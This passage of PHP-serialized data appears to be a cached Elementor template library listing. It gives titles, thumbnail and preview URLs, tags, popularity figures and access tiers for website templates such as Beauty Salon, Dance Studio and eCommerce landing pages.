Contact\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/12/contact.jpg\";s:12:\"tmpl_created\";i:1608622374;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/beauty-salon-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:548;s:11:\"trend_index\";i:101;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:342;a:20:{s:4:\"tmpl\";i:1180;s:2:\"id\";i:18340;s:5:\"title\";s:30:\"Restaurant &#8211; Coming Soon\";s:9:\"thumbnail\";s:98:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Restuarant-Coming-Soon-LP.png\";s:12:\"tmpl_created\";i:1614772183;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/restaurant-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:51:\"[\"Coming Soon\",\"Food\",\"Landing Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:810;s:11:\"trend_index\";i:809;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:343;a:20:{s:4:\"tmpl\";i:499;s:2:\"id\";i:5413;s:5:\"title\";s:8:\"About 21\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2.png\";s:12:\"tmpl_created\";i:1520443507;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:83;s:11:\"trend_index\";i:52;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:344;a:20:{s:4:\"tmpl\";i:1126;s:2:\"id\";i:16496;s:5:\"title\";s:28:\"Beauty Salon &#8211; Gallery\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/12/gallery-1.jpg\";s:12:\"tmpl_created\";i:1608622379;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/beauty-salon-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:69;s:16:\"popularity_index\";i:491;s:11:\"trend_index\";i:90;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:345;a:20:{s:4:\"tmpl\";i:1173;s:2:\"id\";i:17480;s:5:\"title\";s:42:\"At-home Massage Therapist &#8211; Business\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/02/At-Home-Massage-Therapist.jpg\";s:12:\"tmpl_created\";i:1612879264;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/at-home-massage-therapist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:60:\"[\"Business\",\"Health\",\"Landing Pages\",\"Services\",\"Therapist\"]\";s:10:\"menu_order\";i:69;s:16:\"popularity_index\";i:856;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:346;a:20:{s:4:\"tmpl\";i:1127;s:2:\"id\";i:16457;s:5:\"title\";s:25:\"Beauty Salon &#8211; Home\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/12/home-1.jpg\";s:12:\"tmpl_created\";i:1608622383;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/beauty-salon-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:70;s:16:\"popularity_index\";i:408;s:11:\"trend_index\";i:56;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:347;a:20:{s:4:\"tmpl\";i:1178;s:2:\"id\";i:18317;s:5:\"title\";s:26:\"Insurance &#8211; Business\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Life-Insirance.png\";s:12:\"tmpl_created\";i:1614769488;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/lp/insurance-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:61:\"[\"Business\",\"Family\",\"Financial\",\"Insurance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:70;s:16:\"popularity_index\";i:870;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:348;a:20:{s:4:\"tmpl\";i:1128;s:2:\"id\";i:16518;s:5:\"title\";s:29:\"Beauty Salon &#8211; Services\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/12/services-1.jpg\";s:12:\"tmpl_created\";i:1608622386;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/beauty-salon-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:664;s:11:\"trend_index\";i:261;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:349;a:20:{s:4:\"tmpl\";i:1168;s:2:\"id\";i:17401;s:5:\"title\";s:40:\"Conference Thank You Page &#8211; Events\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280.png\";s:12:\"tmpl_created\";i:1612724753;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/conference-thank-you-page-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:59:\"[\"Conference\",\"Event\",\"Events\",\"Landing Pages\",\"Thank You\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:799;s:11:\"trend_index\";i:540;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:350;a:20:{s:4:\"tmpl\";i:503;s:2:\"id\";i:5447;s:5:\"title\";s:7:\"About 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_5.png\";s:12:\"tmpl_created\";i:1520443514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-3-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:48;s:11:\"trend_index\";i:12;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:351;a:20:{s:4:\"tmpl\";i:1073;s:2:\"id\";i:15486;s:5:\"title\";s:25:\"Travel Blog &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/11/About.jpg\";s:12:\"tmpl_created\";i:1606215720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/travel-blog-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:72;s:16:\"popularity_index\";i:608;s:11:\"trend_index\";i:343;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:352;a:20:{s:4:\"tmpl\";i:1166;s:2:\"id\";i:17368;s:5:\"title\";s:38:\"Real Estate Agency &#8211; Real-Estate\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Real-Estate.png\";s:12:\"tmpl_created\";i:1612711814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/lp/real-estate-agency-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"Real Estate\";s:4:\"tags\";s:73:\"[\"Landing Pages\",\"listing\",\"Real estate\",\"Realestate\",\"realtor\",\"realty\"]\";s:10:\"menu_order\";i:72;s:16:\"popularity_index\";i:858;s:11:\"trend_index\";i:777;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:353;a:20:{s:4:\"tmpl\";i:1074;s:2:\"id\";i:15478;s:5:\"title\";s:27:\"Travel Blog &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/11/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1606215735;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/travel-blog-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:687;s:11:\"trend_index\";i:564;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:354;a:20:{s:4:\"tmpl\";i:1170;s:2:\"id\";i:17423;s:5:\"title\";s:57:\"Volunteer Calls Thank You Page &#8211; Social Involvement\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/02/Volunteer-Calls-TYP.jpg\";s:12:\"tmpl_created\";i:1612726058;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:151:\"https://library.elementor.com/lp/volunteer-calls-thank-you-page-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:62:\"[\"Care\",\"Involvement\",\"Landing Pages\",\"Thank You\",\"Volunteer\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:857;s:11:\"trend_index\";i:818;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:355;a:20:{s:4:\"tmpl\";i:507;s:2:\"id\";i:5480;s:5:\"title\";s:7:\"About 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_7-1.png\";s:12:\"tmpl_created\";i:1520443522;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-4-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:428;s:11:\"trend_index\";i:303;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:356;a:20:{s:4:\"tmpl\";i:1075;s:2:\"id\";i:15467;s:5:\"title\";s:24:\"Travel Blog &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/11/Home.jpg\";s:12:\"tmpl_created\";i:1606215756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/travel-blog-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:74;s:16:\"popularity_index\";i:567;s:11:\"trend_index\";i:224;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:357;a:20:{s:4:\"tmpl\";i:1169;s:2:\"id\";i:17409;s:5:\"title\";s:37:\"Webinar Thank You Page &#8211; Events\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Webinar-TYP.png\";s:12:\"tmpl_created\";i:1612725644;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/webinar-thank-you-page-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:56:\"[\"Event\",\"Events\",\"Landing Pages\",\"Thank You\",\"Webinar\"]\";s:10:\"menu_order\";i:74;s:16:\"popularity_index\";i:868;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:358;a:20:{s:4:\"tmpl\";i:1056;s:2:\"id\";i:15317;s:5:\"title\";s:25:\"Dance Studio &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/10/Home.jpg\";s:12:\"tmpl_created\";i:1603181291;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/dance-studio-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:596;s:11:\"trend_index\";i:301;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:359;a:20:{s:4:\"tmpl\";i:545;s:2:\"id\";i:6027;s:5:\"title\";s:7:\"About 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1-1.png\";s:12:\"tmpl_created\";i:1520443639;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-5-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:40;s:11:\"trend_index\";i:40;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:360;a:20:{s:4:\"tmpl\";i:1160;s:2:\"id\";i:17258;s:5:\"title\";s:32:\"Beauty Product &#8211; eCommerce\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2021/01/Beauty-Product.png\";s:12:\"tmpl_created\";i:1610903153;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/beauty-product-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:38:\"[\"Beauty\",\"Ecommerce\",\"Landing Pages\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:797;s:11:\"trend_index\";i:703;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:361;a:20:{s:4:\"tmpl\";i:1057;s:2:\"id\";i:15334;s:5:\"title\";s:26:\"Dance Studio &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/About.jpg\";s:12:\"tmpl_created\";i:1603181364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/dance-studio-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:626;s:11:\"trend_index\";i:373;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:362;a:20:{s:4:\"tmpl\";i:546;s:2:\"id\";i:6036;s:5:\"title\";s:7:\"About 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1-1.png\";s:12:\"tmpl_created\";i:1520443641;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-6-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:90;s:11:\"trend_index\";i:123;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:363;a:20:{s:4:\"tmpl\";i:1171;s:2:\"id\";i:17435;s:5:\"title\";s:39:\"Gym &#8211; App Service &#8211; Product\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280-4.png\";s:12:\"tmpl_created\";i:1612726462;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/gym-app-service-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:58:\"[\"App\",\"Fitness\",\"Gym\",\"Health\",\"Landing Pages\",\"Product\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:767;s:11:\"trend_index\";i:577;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:364;a:20:{s:4:\"tmpl\";i:1058;s:2:\"id\";i:15349;s:5:\"title\";s:28:\"Dance Studio &#8211; Classes\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/10/Classes.jpg\";s:12:\"tmpl_created\";i:1603181425;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dance-studio-classes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:77;s:16:\"popularity_index\";i:629;s:11:\"trend_index\";i:458;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:365;a:20:{s:4:\"tmpl\";i:1156;s:2:\"id\";i:17111;s:5:\"title\";s:33:\"Sunglasses Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/01/Sunglasses-LP-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610632408;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/sunglasses-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:59:\"[\"Ecommerce\",\"Fashion\",\"Landing Pages\",\"Sale\",\"Sunglasses\"]\";s:10:\"menu_order\";i:77;s:16:\"popularity_index\";i:812;s:11:\"trend_index\";i:732;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:366;a:20:{s:4:\"tmpl\";i:1055;s:2:\"id\";i:15366;s:5:\"title\";s:29:\"Dance Studio &#8211; Schedule\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/10/Classes-Schedule.jpg\";s:12:\"tmpl_created\";i:1603181056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/dance-studio-schedule/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:698;s:11:\"trend_index\";i:602;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:367;a:20:{s:4:\"tmpl\";i:1157;s:2:\"id\";i:17223;s:5:\"title\";s:25:\"Fashion &#8211; eCommerce\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2021/01/Commerce-Fashion.png\";s:12:\"tmpl_created\";i:1610902553;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/fashion-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:29:\"[\"Ecommerce\",\"Landing Pages\"]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:808;s:11:\"trend_index\";i:745;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:368;a:20:{s:4:\"tmpl\";i:1059;s:2:\"id\";i:15373;s:5:\"title\";s:28:\"Dance Studio &#8211; Pricing\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/10/Pricing.jpg\";s:12:\"tmpl_created\";i:1603181678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dance-studio-pricing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:731;s:11:\"trend_index\";i:661;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:369;a:20:{s:4:\"tmpl\";i:1151;s:2:\"id\";i:17017;s:5:\"title\";s:28:\"Shoes Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/01/Shoes-LP-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610535361;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/shoes-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:55:\"[\"Discount\",\"Ecommerce\",\"Landing 